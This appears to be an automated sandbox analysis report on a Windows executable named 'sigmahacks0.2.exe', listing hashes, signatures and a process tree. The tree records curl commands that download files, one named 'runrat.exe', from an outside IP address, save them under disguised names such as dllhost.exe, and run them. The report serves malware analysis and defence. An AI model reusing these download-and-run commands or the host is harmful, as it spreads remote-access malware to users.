Analysis

  • max time kernel
    63s
  • max time network
    50s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-06-2024 16:35

General

  • Target

    sigmahacks0.2.exe

  • Size

    89KB

  • MD5

    74a12486910c20f150195ef0584d827b

  • SHA1

    e12a068b244c9646fa0ec2f989bcc08c285d1780

  • SHA256

    3c8d5c2b52242137822451d7ce4ba46e04087a8de82a427a4c1450aa09e85af3

  • SHA512

    c515b3fc165e6453dda59ab619f8fdae28fbf85d0631f5132f8a8e682a691f64bd1ce721512385d9a416b88577346fdc7edda24eeb846d7791430619b5e4b696

  • SSDEEP

    1536:T7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfrw5COh:P7DhdC6kzWypvaQ0FxyNTBfrw

Score
1/10

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe
    "C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3664
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\465F.tmp\4660.tmp\4671.bat C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:216
      • C:\Windows\system32\curl.exe
        curl -s -o dllhost.exe "http://45.157.232.173:5151/downloads/runincognito.exe"
        3⤵
          PID:4508
        • C:\Windows\system32\dllhost.exe
          dllhost.exe
          3⤵
            PID:876
          • C:\Windows\system32\curl.exe
            curl -s -o Incognito.exe "http://45.157.232.173:5151/downloads/runrat.exe"
            3⤵
              PID:3536

        Network

        MITRE ATT&CK Matrix

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\465F.tmp\4660.tmp\4671.bat

          Filesize

          306B

          MD5

          aa6cd2e5eea38082199a03f164836f90

          SHA1

          93f21ab96c7f4b66e3d6d221414bbd7f82b3a293

          SHA256

          035ddce5103edf606392d566ab937bd060c1e6510eb5ffd7ffa1fc8c71f5853a

          SHA512

          dde5c9196df1246b5bbd69a7926fe8aa514c82daa01ead3eca1e5b1fdeb2c86678881cfabf8bf78a501be366a272c6aac92849a77d58e5db2bd6cda511a6cc06